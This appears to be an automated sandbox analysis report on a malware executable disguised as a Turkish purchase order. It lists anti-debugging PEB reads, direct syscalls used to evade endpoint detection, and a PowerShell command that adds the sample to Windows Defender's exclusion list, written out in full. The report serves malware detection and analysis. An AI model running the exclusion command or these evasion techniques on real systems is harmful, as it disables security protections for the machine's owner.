Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2835 mov eax, dword ptr fs:[00000030h]	5_2_013E2835
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2835 mov ecx, dword ptr fs:[00000030h]	5_2_013E2835
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2835 mov eax, dword ptr fs:[00000030h]	5_2_013E2835
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2835 mov eax, dword ptr fs:[00000030h]	5_2_013E2835
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FA830 mov eax, dword ptr fs:[00000030h]	5_2_013FA830
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01456870 mov eax, dword ptr fs:[00000030h]	5_2_01456870
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01456870 mov eax, dword ptr fs:[00000030h]	5_2_01456870
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144E872 mov eax, dword ptr fs:[00000030h]	5_2_0144E872
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144E872 mov eax, dword ptr fs:[00000030h]	5_2_0144E872
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144C810 mov eax, dword ptr fs:[00000030h]	5_2_0144C810
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4859 mov eax, dword ptr fs:[00000030h]	5_2_013C4859
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C4859 mov eax, dword ptr fs:[00000030h]	5_2_013C4859
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F0854 mov eax, dword ptr fs:[00000030h]	5_2_013F0854
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146483A mov eax, dword ptr fs:[00000030h]	5_2_0146483A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146483A mov eax, dword ptr fs:[00000030h]	5_2_0146483A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D2840 mov ecx, dword ptr fs:[00000030h]	5_2_013D2840
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148A8E4 mov eax, dword ptr fs:[00000030h]	5_2_0148A8E4
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0887 mov eax, dword ptr fs:[00000030h]	5_2_013C0887
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC8F9 mov eax, dword ptr fs:[00000030h]	5_2_013FC8F9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FC8F9 mov eax, dword ptr fs:[00000030h]	5_2_013FC8F9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144C89D mov eax, dword ptr fs:[00000030h]	5_2_0144C89D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EE8C0 mov eax, dword ptr fs:[00000030h]	5_2_013EE8C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01468B42 mov eax, dword ptr fs:[00000030h]	5_2_01468B42
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01456B40 mov eax, dword ptr fs:[00000030h]	5_2_01456B40
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01456B40 mov eax, dword ptr fs:[00000030h]	5_2_01456B40
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148AB40 mov eax, dword ptr fs:[00000030h]	5_2_0148AB40
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01474B4B mov eax, dword ptr fs:[00000030h]	5_2_01474B4B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01474B4B mov eax, dword ptr fs:[00000030h]	5_2_01474B4B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146EB50 mov eax, dword ptr fs:[00000030h]	5_2_0146EB50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EEB20 mov eax, dword ptr fs:[00000030h]	5_2_013EEB20
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EEB20 mov eax, dword ptr fs:[00000030h]	5_2_013EEB20
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BCB7E mov eax, dword ptr fs:[00000030h]	5_2_013BCB7E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143EB1D mov eax, dword ptr fs:[00000030h]	5_2_0143EB1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01488B28 mov eax, dword ptr fs:[00000030h]	5_2_01488B28
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01488B28 mov eax, dword ptr fs:[00000030h]	5_2_01488B28
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0BBE mov eax, dword ptr fs:[00000030h]	5_2_013D0BBE
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0BBE mov eax, dword ptr fs:[00000030h]	5_2_013D0BBE
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146EBD0 mov eax, dword ptr fs:[00000030h]	5_2_0146EBD0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144CBF0 mov eax, dword ptr fs:[00000030h]	5_2_0144CBF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EEBFC mov eax, dword ptr fs:[00000030h]	5_2_013EEBFC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8BF0 mov eax, dword ptr fs:[00000030h]	5_2_013C8BF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8BF0 mov eax, dword ptr fs:[00000030h]	5_2_013C8BF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8BF0 mov eax, dword ptr fs:[00000030h]	5_2_013C8BF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0BCD mov eax, dword ptr fs:[00000030h]	5_2_013C0BCD
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0BCD mov eax, dword ptr fs:[00000030h]	5_2_013C0BCD
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0BCD mov eax, dword ptr fs:[00000030h]	5_2_013C0BCD
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E0BCB mov eax, dword ptr fs:[00000030h]	5_2_013E0BCB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E0BCB mov eax, dword ptr fs:[00000030h]	5_2_013E0BCB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E0BCB mov eax, dword ptr fs:[00000030h]	5_2_013E0BCB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01474BB0 mov eax, dword ptr fs:[00000030h]	5_2_01474BB0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01474BB0 mov eax, dword ptr fs:[00000030h]	5_2_01474BB0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FCA38 mov eax, dword ptr fs:[00000030h]	5_2_013FCA38
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E4A35 mov eax, dword ptr fs:[00000030h]	5_2_013E4A35
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E4A35 mov eax, dword ptr fs:[00000030h]	5_2_013E4A35
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EEA2E mov eax, dword ptr fs:[00000030h]	5_2_013EEA2E
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FCA24 mov eax, dword ptr fs:[00000030h]	5_2_013FCA24
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146EA60 mov eax, dword ptr fs:[00000030h]	5_2_0146EA60
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143CA72 mov eax, dword ptr fs:[00000030h]	5_2_0143CA72
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143CA72 mov eax, dword ptr fs:[00000030h]	5_2_0143CA72
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FCA6F mov eax, dword ptr fs:[00000030h]	5_2_013FCA6F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FCA6F mov eax, dword ptr fs:[00000030h]	5_2_013FCA6F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FCA6F mov eax, dword ptr fs:[00000030h]	5_2_013FCA6F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144CA11 mov eax, dword ptr fs:[00000030h]	5_2_0144CA11
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0A5B mov eax, dword ptr fs:[00000030h]	5_2_013D0A5B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0A5B mov eax, dword ptr fs:[00000030h]	5_2_013D0A5B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C6A50 mov eax, dword ptr fs:[00000030h]	5_2_013C6A50
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01416ACC mov eax, dword ptr fs:[00000030h]	5_2_01416ACC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01416ACC mov eax, dword ptr fs:[00000030h]	5_2_01416ACC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01416ACC mov eax, dword ptr fs:[00000030h]	5_2_01416ACC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8AA0 mov eax, dword ptr fs:[00000030h]	5_2_013C8AA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C8AA0 mov eax, dword ptr fs:[00000030h]	5_2_013C8AA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F8A90 mov edx, dword ptr fs:[00000030h]	5_2_013F8A90
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80 mov eax, dword ptr fs:[00000030h]	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01494A80 mov eax, dword ptr fs:[00000030h]	5_2_01494A80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FAAEE mov eax, dword ptr fs:[00000030h]	5_2_013FAAEE
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FAAEE mov eax, dword ptr fs:[00000030h]	5_2_013FAAEE
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01416AA4 mov eax, dword ptr fs:[00000030h]	5_2_01416AA4
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0AD0 mov eax, dword ptr fs:[00000030h]	5_2_013C0AD0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F4AD0 mov eax, dword ptr fs:[00000030h]	5_2_013F4AD0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F4AD0 mov eax, dword ptr fs:[00000030h]	5_2_013F4AD0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F4D1D mov eax, dword ptr fs:[00000030h]	5_2_013F4D1D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B6D10 mov eax, dword ptr fs:[00000030h]	5_2_013B6D10
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B6D10 mov eax, dword ptr fs:[00000030h]	5_2_013B6D10
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B6D10 mov eax, dword ptr fs:[00000030h]	5_2_013B6D10
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01458D6B mov eax, dword ptr fs:[00000030h]	5_2_01458D6B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DAD00 mov eax, dword ptr fs:[00000030h]	5_2_013DAD00
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DAD00 mov eax, dword ptr fs:[00000030h]	5_2_013DAD00

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe"			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtCreateFile: Direct from: 0x77462FEC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtOpenFile: Direct from: 0x77462DCC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtQueryInformationToken: Direct from: 0x77462CAC	Jump to behavior
Source: C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe	NtTerminateThread: Direct from: 0x77462FCC	Jump to behavior
